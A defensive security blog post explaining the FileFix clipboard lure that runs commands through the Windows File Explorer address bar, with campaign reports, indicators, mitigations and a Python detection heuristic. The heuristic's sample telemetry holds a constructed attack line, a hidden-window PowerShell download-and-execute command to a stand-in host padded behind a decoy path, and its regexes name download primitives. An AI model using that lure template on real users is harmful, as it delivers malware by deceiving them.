Cybercriminals keep getting cleverer. FileFix is a social engineering technique that builds on earlier clipboard-hijacking lures (the ClickFix family) but uses the Windows File Explorer address bar as its execution vector. Over the last few months security teams have watched it move from proof of concept to real-world abuse, with multiple threat groups using it to deliver remote access tools and information stealers.

What is FileFix in plain English

FileFix tricks a user into copying a string from a web page and pasting it into the address bar of File Explorer, usually on the promise that it is the path to a shared document. The pasted text is not a path. The address bar will launch any executable named at the start of the input, so the string begins with a command, most often a PowerShell one-liner that downloads and runs malware, followed by a long run of spaces and a decoy file path. The decoy sits behind a comment marker so the interpreter ignores it, and the padding pushes the real command out of the visible part of the address bar, so the victim sees something that looks like a normal path and presses Enter. Because everything happens inside trusted operating system components, there is no download prompt or browser warning, and some endpoint defenses do not flag it.

How this developed and why it matters now

A security researcher first demonstrated the basic idea earlier in 2025 as a proof of concept. Since then attackers have adopted it in live campaigns. Multiple vendors and incident responders have published analyses showing it used to deploy remote access trojans and information stealers, and as an initial access step for ransomware operations that use double extortion. The technique is attractive because it is pure social engineering: it abuses intended Windows behavior rather than a software vulnerability, so there is nothing to patch.

Recent disclosures and observed campaigns

• Check Point and several other research teams published technical write-ups showing FileFix in the wild and explaining the exact copy-and-paste flow attackers use.
• Arctic Wolf and other incident responders reported FileFix being used to deliver the Interlock remote access tool and, later, Interlock ransomware in targeted intrusions.
• On September 16 and 17 security outlets reported a new variant that uses image hosting sites and steganography to hide payloads and delivers the StealC information stealer from multilingual phishing pages. That campaign shows the technique is evolving and being combined with other evasion tactics.

Why traditional protections can miss it

FileFix does not need a malicious file to reach the machine the usual way. The attack relies on ordinary UI operations, the system clipboard and the File Explorer address bar, so there is no attachment or browser download for email gateways or web filters to scan, and the code that first runs carries no Mark of the Web, which some protections rely on to trigger warnings. Detection therefore has to look at what happens after the paste: a script host such as PowerShell starting as a child of explorer.exe, followed by network connections to unusual hosts. Several defenders have published detection guides and rules you can adopt.

Quick indicators of compromise to watch for

• An unexpected pop-up or web page instructing you to copy a "file path" and paste it into the File Explorer address bar.
• A web page that writes to the clipboard when you click a button, often text that differs from what was displayed.
• PowerShell, cmd.exe or another script host starting as a child process of explorer.exe immediately after a paste.
• Command lines that contain a long run of whitespace followed by a comment marker and a plausible-looking file path.
• Outbound connections or downloads to obscure code hosting or image hosting services right after the user action.
• Newly created or renamed scripts and executables in temporary folders.
These signs are useful to add to detection rules and to teach security teams what to look for.

Practical steps to protect yourself and your organization

  1. Train people never to copy and paste paths or commands from untrusted web pages, emails or messages. No legitimate file share asks you to paste a path into File Explorer, so treat any such request as an attack.
  2. Restrict script hosts for users who do not need them. Note that the PowerShell execution policy does not help here, because the pasted command runs inline as a command-line argument rather than from a script file. Use application control (AppLocker or WDAC) to block powershell.exe, cmd.exe, mshta.exe and similar for standard users, or at least enforce PowerShell Constrained Language Mode.
  3. Create endpoint detection rules for script hosts spawned with explorer.exe as the parent, especially when the command line contains long whitespace runs, download cmdlets or hidden-window switches. Many detection teams have published analytics you can adapt.
  4. Block known malicious domains and code repositories used by recent campaigns and monitor traffic to image hosting services used for covert payload delivery.
  5. Run endpoints with least privilege and remove local admin rights from day-to-day users. This limits what a pasted command can do (no system-wide persistence, no credential dumping), but information stealers run happily in a standard user context, so it reduces impact rather than preventing the attack.
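To make step 3 concrete, and to show the anatomy of the pasted string described under "What is FileFix", here is a small detection heuristic over process-creation telemetry. It is an added example written for this post, not code from the original article or from any vendor's published rule set. The input records are constructed Sysmon Event ID 1 / Security 4688-style fields (parent image, image, command line); the field names, score weights, whitespace threshold and regular expressions are my assumptions to tune against your own telemetry, and the sample command line imitates the published proof of concept, in which the real command is followed by a comment marker and a long run of spaces ahead of a decoy path.

```python
"""FileFix-style detection over process-creation events.

Added example for this post; not code from the original article or from any
vendor's detection rules. Records imitate Sysmon Event ID 1 / Security 4688
fields (parent image, image, command line). Field names, score weights and
regexes are assumptions you should tune to your own telemetry.
"""
import re
from dataclasses import dataclass

# Script hosts the File Explorer address bar will happily launch (assumed list; extend it).
HOST_PROCESSES = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}

# Download-and-execute primitives commonly seen in pasted one-liners.
DOWNLOAD_RE = re.compile(r"(?i)\b(invoke-webrequest|iwr|invoke-restmethod|irm|downloadstring|"
                         r"downloadfile|invoke-expression|iex|bitsadmin|certutil)\b")
# Switches that hide the window or sidestep policy.
HIDDEN_RE = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass")
# A long run of spaces pushes the real command out of the visible part of the address bar.
PADDING_RE = re.compile(r" {20,}")
# Trailing "# C:\..." or "# \\server\...": a PowerShell comment that reads like a file path.
DECOY_RE = re.compile(r"#\s*((?:[A-Za-z]:\\|\\\\)[^\r\n]*)$")


@dataclass
class ProcEvent:
    parent_image: str   # e.g. C:\Windows\explorer.exe
    image: str          # e.g. ...\powershell.exe
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_command_line(cmd: str) -> dict:
    """Pull the FileFix tells out of a single command line."""
    pad = PADDING_RE.search(cmd)
    decoy = DECOY_RE.search(cmd)
    return {
        "padding": pad is not None,
        "decoy_path": decoy.group(1).strip() if decoy else None,
        "download": DOWNLOAD_RE.search(cmd) is not None,
        "hidden_flags": HIDDEN_RE.search(cmd) is not None,
        # What the victim actually saw in the address bar: the text after the padding.
        "visible_tail": cmd[pad.end():] if pad else cmd,
    }


def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Weighted score. Weights are assumptions chosen so that a bare 'powershell'
    typed into the address bar (a legitimate habit) stays below the threshold."""
    score, reasons = 0, []
    parent, child = _basename(ev.parent_image), _basename(ev.image)
    if parent == "explorer.exe" and child in HOST_PROCESSES:
        score += 2
        reasons.append(f"{child} started directly by explorer.exe")
    tells = analyze_command_line(ev.command_line)
    if tells["padding"]:
        score += 2
        reasons.append("long whitespace run hides the start of the command")
    if tells["decoy_path"]:
        score += 2
        reasons.append(f"trailing comment disguised as a path: {tells['decoy_path']}")
    if tells["download"]:
        score += 1
        reasons.append("download/execute primitive in command line")
    if tells["hidden_flags"]:
        score += 1
        reasons.append("hidden-window or policy-bypass switches")
    return score, reasons


def is_filefix_like(ev: ProcEvent, threshold: int = 4) -> bool:
    return score_event(ev)[0] >= threshold


def triage(events: list[ProcEvent], threshold: int = 4) -> list[dict]:
    """Return the flagged events with their score, reasons and what the victim saw."""
    out = []
    for i, ev in enumerate(events):
        score, reasons = score_event(ev)
        if score >= threshold:
            out.append({"index": i, "score": score, "reasons": reasons,
                        "visible_tail": analyze_command_line(ev.command_line)["visible_tail"]})
    return out


# Constructed sample telemetry. The first command line imitates the published proof of
# concept: real command, then padding, then a decoy path hidden behind a PowerShell comment.
# The host name uses the reserved .invalid TLD; it is not a real indicator.
FILEFIX_PASTE = ('powershell.exe -w hidden -c "iex (iwr http://files.example.invalid/update.txt)"'
                 + " " * 120 + r"# C:\Company\Internal\HR-Policy-2025.pdf")
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", PS_IMAGE, FILEFIX_PASTE),                 # the attack
    ProcEvent(r"C:\Windows\explorer.exe", PS_IMAGE, "powershell.exe"),              # user opened a console
    ProcEvent(r"C:\Windows\System32\cmd.exe", PS_IMAGE,
              r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"),         # scheduled admin script
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"event {hit['index']} score={hit['score']} victim saw: {hit['visible_tail']!r}")
        for reason in hit["reasons"]:
            print("  -", reason)
```

Only the first sample trips the threshold: the padding and decoy comment each carry as much weight as the explorer.exe parent, so a user who simply types powershell into the address bar scores 2 and an administrator's scheduled script scores 1. Run over real telemetry, the explorer.exe-parent check should be paired with command-line logging (Sysmon or the 4688 command-line audit setting), because without the command line the padding and decoy tells are invisible.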

Final thoughts and what to watch next

FileFix is a reminder that human habit at the user interface can be the weakest link. Attackers are moving away from noisy exploits toward tricks that blend into normal user behavior. Expect more variants that combine clipboard tactics with stealthy payload hosting and obfuscation. Defenders should pair user education with telemetry-based detection that catches the activity chain after the trick has been executed. Recent reporting shows the technique is actively delivering serious malware, so it should be treated as a real operational threat now.
